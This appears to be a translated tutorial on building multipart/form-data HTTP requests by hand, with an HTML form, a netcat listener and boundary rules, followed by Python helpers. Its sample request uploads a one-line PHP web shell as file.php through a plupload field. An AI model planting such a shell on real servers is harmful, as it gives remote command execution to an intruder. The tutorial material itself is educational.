HTML & netcat
First, create an .html file with the form that will generate the request:
<form action="http://localhost:8000" method="post" enctype="multipart/form-data">
<p><input type="text" name="nombre" value="jorgesito">
<p><input type="text" name="apellido" value="alvarado">
<p><input type="file" name="avatar">
<p><button type="submit">Submit</button>
</form>
Create the file to upload:
echo "si buenas" > hola.txt
Then, take the port from the form's action URL (8000) and listen on that port:
nc -lvp 8000
Now, open the .html file in the browser, select the file and submit the request. We will see something like:


Manually create this request
POST / HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Length: 323
Content-Type: multipart/form-data; boundary=---divino

-----divino
Content-Disposition: form-data; name="plupload"

1
-----divino
Content-Disposition: form-data; name="name"

file.php
-----divino
Content-Disposition: form-data; name="file"; filename="file.txt"
Content-Type: application/octet-stream

<?php system($_GET["xmd"]); ?>
-----divino--
Keep this header in mind:
Content-Type: multipart/form-data; boundary=---divino
https://www.w3.org/TR/html401/interact/forms.html#h-17.13.4.2
A boundary separates the pieces of information traveling in the request: it "divides" them and indicates where each one starts and ends.
In our example:
In the Content-Type header we define the boundary. Here it is three dashes (---) followed by an arbitrary string (divino).
In the request body the boundary is the same, but each occurrence must be prefixed with two dashes (required). So, if the header says boundary=ay, the boundary in the body will be --ay. That is why ---divino appears in the body as -----divino.
On the last line of the body, the boundary must also end with two dashes (--), as in -----divino--. This indicates the final boundary of the body.
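The three boundary rules above, as an added example (not code from the original page): it builds the body for the form's own fields and the hola.txt file, computes Content-Length from the real byte count, and splits the body back into its parts. The function names are illustrative assumptions.

```python
# Added example: build and re-parse a multipart/form-data body by hand.
CRLF = b"\r\n"

def build_multipart(boundary, fields, files):
    """Body bytes for text fields and {name: (filename, content)} file fields."""
    delim = b"--" + boundary.encode()      # body delimiter = "--" + header boundary
    out = []
    for name, value in fields.items():
        out += [delim,
                f'Content-Disposition: form-data; name="{name}"'.encode(),
                b"",                       # blank line ends the part headers
                value.encode()]
    for name, (filename, content) in files.items():
        out += [delim,
                f'Content-Disposition: form-data; name="{name}"; filename="{filename}"'.encode(),
                b"Content-Type: application/octet-stream",
                b"",
                content]
    out.append(delim + b"--")              # closing delimiter: trailing "--"
    return CRLF.join(out) + CRLF

def split_parts(body, boundary):
    """Split a body back into (headers, content) pairs, checking the framing."""
    delim = b"--" + boundary.encode()
    head, sep, _epilogue = body.partition(CRLF + delim + b"--")
    if not sep or not head.startswith(delim + CRLF):
        raise ValueError("missing opening or closing delimiter")
    parts = []
    for chunk in head[len(delim) + 2:].split(CRLF + delim + CRLF):
        raw_headers, _, content = chunk.partition(CRLF + CRLF)
        headers = dict(h.decode().split(": ", 1) for h in raw_headers.split(CRLF))
        parts.append((headers, content))
    return parts

def build_request(host, boundary, body):
    """Request head with Content-Length taken from the actual body size."""
    head = (f"POST / HTTP/1.1\r\nHost: {host}\r\n"
            f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
            f"Content-Length: {len(body)}\r\nConnection: close\r\n\r\n")
    return head.encode() + body

# Values taken from the page: the boundary, the form fields and hola.txt.
BOUNDARY = "---divino"
BODY = build_multipart(BOUNDARY,
                       {"nombre": "jorgesito", "apellido": "alvarado"},
                       {"avatar": ("hola.txt", b"si buenas\n")})
```
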